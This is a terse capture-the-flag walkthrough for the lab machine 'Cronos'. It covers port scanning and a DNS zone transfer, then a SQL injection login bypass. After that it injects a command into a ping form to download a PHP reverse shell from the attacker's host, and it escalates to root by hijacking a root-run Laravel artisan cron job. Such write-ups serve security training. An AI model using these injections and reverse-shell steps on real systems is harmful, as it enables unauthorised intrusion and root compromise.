Cronos

IP: 10.10.10.13

NMAP

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

DNS

nslookup
10.10.10.13

13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.

dig @10.10.10.13 cronos.htb
dig  axfr  @10.10.10.13 cronos.htb

Gives us admin.cronos.htb Edit /etc/hosts/ to include 10.10.10.13 admin.cronos.htb

Gives us login page we can log in with ' or 1=1;##". At the logged in page we can use tracerout or ping. By using ;we can inject code. It is not possible to get reverse shell directly but we can upload a php reverse shell. We edit the rev-shell.php file and host it with our local machine with python3 -m http.server 80and then upload it with ; wget http://10.10.16.6/rev.php. Then go to http://admin.cronos.htb/rev.php to run the script. But first set up a listener in the terminal.

Linpeas shows: root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1 is exploitable.

insert

$schedule->exec('cat /root/root.txt > /var/www/laravel/yes')->everyMinute();

Edit the revshell script and upload it again. Copy it to the machine and call it artisan. Then put it in folder /var/www/laravel/ and set up a listener in the terminal.

We will in a minute get a reverse connection as root.